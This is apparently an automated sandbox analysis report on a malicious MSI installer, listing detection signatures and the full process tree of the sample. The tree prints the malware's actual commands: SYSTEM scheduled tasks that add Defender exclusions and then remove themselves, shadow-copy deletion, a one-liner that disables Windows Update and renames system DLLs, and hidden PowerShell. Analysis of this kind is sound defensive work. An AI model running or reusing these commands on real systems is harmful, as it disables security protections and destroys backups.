Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    04/08/2026, 11:04

General

  • Target
    setup_n0c009.msi
  • Size 7.1MB
  • Sample260804-m6ewvsaa55
  • SHA256 00f23b3e2865f41eccfbfd1ec2eeeea78edee626b523ca66f7b7edd7efd83338
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 16 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 23 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 2 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 30 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup_n0c009.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:3828
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1216
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding F1EB1FD4B4C1F691BA9890172D824F49 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4772
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:3700
  • C:\Users\Public\s6oQza\oW9PTx.exe
    C:\Users\Public\s6oQza\oW9PTx.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2456
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\s6oQza\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\s6oQza\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4296
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:3348
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3220
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4524
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4540
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4784
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:3384
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:2580
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2552
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:2180
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1516
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:664
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2484
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:4824
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:4452
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:2176
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:4112
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:628
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2644
                        • C:\Program Files (x86)\QEamD0\QEamD0.exe
                          "C:\Program Files (x86)\QEamD0\QEamD0.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:224
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1492
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\QEamD0" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5048
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\QEamD0" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              PID:2960
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4176
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4264
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\QEamD0\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:5092
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\QEamD0\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:228
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:1088
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:1700
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo.>c:\xxxx.ini
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3464
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                • Suspicious use of WriteProcessMemory
                                PID:5060
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:3128
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop wuauserv
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3504
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config wuauserv start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:116
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure wuauserv reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:712
                                • C:\Windows\SysWOW64\net.exe
                                  net stop UsoSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2620
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop UsoSvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4812
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config UsoSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:1516
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure UsoSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  PID:1876
                                • C:\Windows\SysWOW64\net.exe
                                  net stop uhssvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3212
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop uhssvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4932
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config uhssvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:3256
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure uhssvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4124
                                • C:\Windows\SysWOW64\net.exe
                                  net stop WaaSMedicSvc
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2220
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2904
                                • C:\Windows\SysWOW64\sc.exe
                                  sc config WaaSMedicSvc start= disabled
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:4016
                                • C:\Windows\SysWOW64\sc.exe
                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                  4⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2840
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4300
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:5008
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:1488
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:2348
                                • C:\Windows\SysWOW64\takeown.exe
                                  takeown /f C:\Windows\System32\wuaueng.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3324
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:3504
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:4500
                                • C:\Windows\SysWOW64\icacls.exe
                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  • System Location Discovery: System Language Discovery
                                  PID:1496
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4768
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1596
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4432
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  PID:3748
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo.>c:\xxxx.ini
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                PID:3212
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c echo.>c:\xxxx.ini
                                3⤵
                                • Executes a command shell one-liner
                                PID:3384
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                3⤵
                                • Indicator Removal: Clear Persistence
                                • Suspicious use of WriteProcessMemory
                                PID:1784
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:3172
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Run /TN "Task1"
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4424
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:4712
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:4316
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\QEamD0" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1840
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • Suspicious use of WriteProcessMemory
                                  PID:2748
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:2876
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4368
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3548
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:3808
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\QEamD0" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1540
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • Suspicious use of WriteProcessMemory
                                  PID:3920
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3512
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:176
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3256
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\QEamD0.exe" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:4660
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\QEamD0\QEamD0.exe" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4572
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\QEamD0\QEamD0.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:2832
                                  • C:\Windows\SysWOW64\icacls.exe
